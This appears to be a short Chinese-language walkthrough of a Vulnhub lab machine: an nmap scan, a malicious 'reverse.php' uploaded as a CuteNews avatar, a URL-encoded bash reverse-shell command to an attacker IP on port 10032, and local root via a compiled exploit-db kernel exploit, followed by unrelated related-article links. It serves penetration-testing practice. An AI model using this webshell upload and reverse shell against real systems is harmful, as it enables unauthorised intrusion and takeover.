[Vulnhub] Simple CuteNews-CMS+Kernel权限提升

Мартин.2024-07-14 21:42

信息收集

IP Address Opening Ports
192.168.8.104 TCP:80

$ nmap -p- 192.168.8.104 --min-rate 1000 -sC -sV

bash 复制代码 
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Please Login / CuteNews
|_http-server-header: Apache/2.4.7 (Ubuntu)

本地权限

注册用户登录

Content-Disposition: form-data; name="avatar_file"; filename="reverse.php"

http://192.168.8.104/uploads/avatar_admin2_reverse.php?cmd=%2Fbin%2Fbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.8.107%2F10032%200%3E%261%27

权限提升

$ cat /etc/os-release

https://www.exploit-db.com/exploits/36746

$ gcc 36746.c -static -o 36746

# ./36746

相关推荐
拥友LikT2 小时前
计算机网络基础篇——计算机网络概述
网络·计算机网络
海洲探索-Hydrovo4 小时前
TTP Aether X 天通透传模块丨国产自主可控大数据双向通讯定位模组
网络·人工智能·科技·算法·信息与通信
半梦半醒*7 小时前
zabbix安装
linux·运维·前端·网络·zabbix
南尘NCA86668 小时前
企业微信防封防投诉拦截系统:从痛点解决到技术实现
java·网络·企业微信
程序猿费益洲9 小时前
Docker 网络详解:(三)四大网络模式
网络·docker·容器
Mr_Meng_De10 小时前
网络安全认证培训机构的痛点
网络
AORO202511 小时前
2025全新三防平板科普:5G-A+卫星通信+国产化
网络·5g·智能手机·电脑·制造·信息与通信
深圳南柯电子11 小时前
车载通信设备EMC整改:高频问题与AI辅助诊断方案|深圳南柯电子
网络·人工智能·互联网·实验室·emc
morning_sir_jking12 小时前
深入解析 kube-proxy:Kubernetes 服务发现的网络基石
网络·kubernetes·服务发现
问道飞鱼12 小时前
【Linux知识】Linux磁盘开机挂载
linux·运维·网络·磁盘·自动挂载
热门推荐
01两千字总结:Codex 国内如何安装和使用的教程,以及如何设置中文回答02BongoCat - 跨平台键盘猫动画工具03GitHub 镜像站点04UV安装并设置国内源05GitLab 零基础入门指南:从安装到项目管理全流程06Linux下V2Ray安装配置指南0746个Nano-banana 精选提示词,持续更新中08智能库存管理的需求预测模型:从业务痛点到落地代码的完整实践092025羊城杯网络安全大赛 wp10UV 工具安装与国内镜像源配置指南